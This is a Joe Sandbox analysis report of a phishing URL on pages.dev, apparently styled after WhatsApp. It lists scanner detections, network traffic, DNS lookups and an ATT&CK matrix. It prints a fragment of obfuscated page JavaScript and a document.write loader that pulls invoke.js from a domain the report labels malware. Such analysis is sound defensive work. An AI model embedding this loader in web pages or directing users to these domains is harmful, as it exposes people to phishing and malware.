Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://dfsvgd.pages.dev/

Overview

General Information

Sample URL:http://dfsvgd.pages.dev/
Analysis ID:1501500
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
HTML page contains obfuscated javascript
HTML page contains string obfuscation

Classification

  • System is w10x64
  • chrome.exe (PID: 1432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2024,i,15532678080872772783,15818285137580571688,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://dfsvgd.pages.dev/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://dfsvgd.pages.dev/Avira URL Cloud: detection malicious, Label: phishing
Source: http://dfsvgd.pages.dev/SlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering
Source: https://dfsvgd.pages.dev/img/wa-logo.svgAvira URL Cloud: Label: phishing
Source: https://dfsvgd.pages.dev/favicon.icoAvira URL Cloud: Label: phishing
Source: https://hzr0dm28m17c.com/7e89a56fa66ca3796726cd5fa0f1906e/invoke.jsAvira URL Cloud: Label: malware
Source: https://dfsvgd.pages.dev/img/logo-2.jpgAvira URL Cloud: Label: phishing
Source: https://dfsvgd.pages.dev/npm/bootstrap-5.1.3/dist/css/bootstrap.min.cssAvira URL Cloud: Label: phishing
Source: https://dfsvgd.pages.dev/npm/bootstrap-icons-1.8.1/font/bootstrap-icons.cssAvira URL Cloud: Label: phishing
Source: https://dfsvgd.pages.dev/npm/backoffer.jsAvira URL Cloud: Label: phishing

Phishing

barindex
Source: https://dfsvgd.pages.dev/HTTP Parser: <!--// == Backoffer //var _0x47eb1f=_0x3e08;function _0x397d(){var _0x13dc24=['F%20%27%73','5%36%
Source: https://dfsvgd.pages.dev/HTTP Parser: Found new string: script . atOptions = {. 'key' : '7e89a56fa66ca3796726cd5fa0f1906e',. 'format' : 'iframe',. 'height' : 50,. 'width' : 320,. 'params' : {}. };. document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://hzr0dm28m17c.com/7e89a56fa66ca3796726cd5fa0f1906e/invoke.js"></scr' + 'ipt>');...
Source: https://dfsvgd.pages.dev/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dfsvgd.pages.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css HTTP/1.1Host: dfsvgd.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dfsvgd.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/bootstrap-5.1.3/dist/css/bootstrap.min.css HTTP/1.1Host: dfsvgd.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dfsvgd.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/backoffer.js HTTP/1.1Host: dfsvgd.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dfsvgd.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/logo-2.jpg HTTP/1.1Host: dfsvgd.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dfsvgd.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/wa-logo.svg HTTP/1.1Host: dfsvgd.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dfsvgd.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/backoffer.js HTTP/1.1Host: dfsvgd.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /7e89a56fa66ca3796726cd5fa0f1906e/invoke.js HTTP/1.1Host: hzr0dm28m17c.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dfsvgd.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dfsvgd.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dfsvgd.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/wa-logo.svg HTTP/1.1Host: dfsvgd.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dfsvgd.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Evd2pypcchxB28h&MD=du8yf362 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Evd2pypcchxB28h&MD=du8yf362 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: dfsvgd.pages.dev
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: hzr0dm28m17c.com
Source: global trafficDNS traffic detected: DNS query: smxtrack.com
Source: unknownHTTP traffic detected: POST /report/v4?s=8pv5SLQdY1NtE7pPoLC0eSnYf1MZgid%2BYcQl3WAwKxM7JAkXRPw4O4DNt%2B0O%2FOOoA0xg1FYw0mlQ0Rx9Q7qvnkXOJoXRnqpTWMxHGD2FMsnKU4zGokRK0CI06PgFRUrCFzn0 HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 462Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.21.6Date: Thu, 29 Aug 2024 22:47:32 GMTContent-Type: application/javascriptContent-Length: 0Connection: closeP3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"Access-Control-Allow-Origin: *Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UAHost: hzr0dm28m17c.com
Source: chromecache_55.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_55.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_53.2.drString found in binary or memory: https://smxtrack.com/tracking202/redirect/rtr.php?t202id=214&c1=RJ_ETH&t202kw=RJ_ETH
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@23/17@19/10
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2024,i,15532678080872772783,15818285137580571688,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://dfsvgd.pages.dev/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2024,i,15532678080872772783,15818285137580571688,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://dfsvgd.pages.dev/100%Avira URL Cloudphishing
http://dfsvgd.pages.dev/100%SlashNextFraudulent Website type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://getbootstrap.com/)0%URL Reputationsafe
https://smxtrack.com/tracking202/redirect/rtr.php?t202id=214&c1=RJ_ETH&t202kw=RJ_ETH0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/blob/main/LICENSE)0%Avira URL Cloudsafe
https://dfsvgd.pages.dev/img/wa-logo.svg100%Avira URL Cloudphishing
https://a.nel.cloudflare.com/report/v4?s=UKLXXHvuekcQ4aoLacKwPYzxX6wUZH5iwB%2Fm325F2Fs5Op0K4cpKAoY0QWUY2Zi%2FiTMBHNAV41jBVCGvFGsHFYBrtWDRvL%2FeQ760zM4q6HvnPTbnTa10pIecUpgvq1rCDIGQ0%Avira URL Cloudsafe
https://dfsvgd.pages.dev/favicon.ico100%Avira URL Cloudphishing
https://hzr0dm28m17c.com/7e89a56fa66ca3796726cd5fa0f1906e/invoke.js100%Avira URL Cloudmalware
https://dfsvgd.pages.dev/img/logo-2.jpg100%Avira URL Cloudphishing
https://dfsvgd.pages.dev/npm/bootstrap-5.1.3/dist/css/bootstrap.min.css100%Avira URL Cloudphishing
https://dfsvgd.pages.dev/npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css100%Avira URL Cloudphishing
https://dfsvgd.pages.dev/npm/backoffer.js100%Avira URL Cloudphishing
https://a.nel.cloudflare.com/report/v4?s=8pv5SLQdY1NtE7pPoLC0eSnYf1MZgid%2BYcQl3WAwKxM7JAkXRPw4O4DNt%2B0O%2FOOoA0xg1FYw0mlQ0Rx9Q7qvnkXOJoXRnqpTWMxHGD2FMsnKU4zGokRK0CI06PgFRUrCFzn00%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
hzr0dm28m17c.com
172.240.108.68
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      dfsvgd.pages.dev
      188.114.96.3
      truefalse
        unknown
        www.google.com
        172.217.16.132
        truefalse
          unknown
          smxtrack.com
          103.253.215.19
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://dfsvgd.pages.dev/img/wa-logo.svgtrue
            • Avira URL Cloud: phishing
            unknown
            https://dfsvgd.pages.dev/favicon.icotrue
            • Avira URL Cloud: phishing
            unknown
            https://dfsvgd.pages.dev/npm/bootstrap-5.1.3/dist/css/bootstrap.min.csstrue
            • Avira URL Cloud: phishing
            unknown
            https://hzr0dm28m17c.com/7e89a56fa66ca3796726cd5fa0f1906e/invoke.jsfalse
            • Avira URL Cloud: malware
            unknown
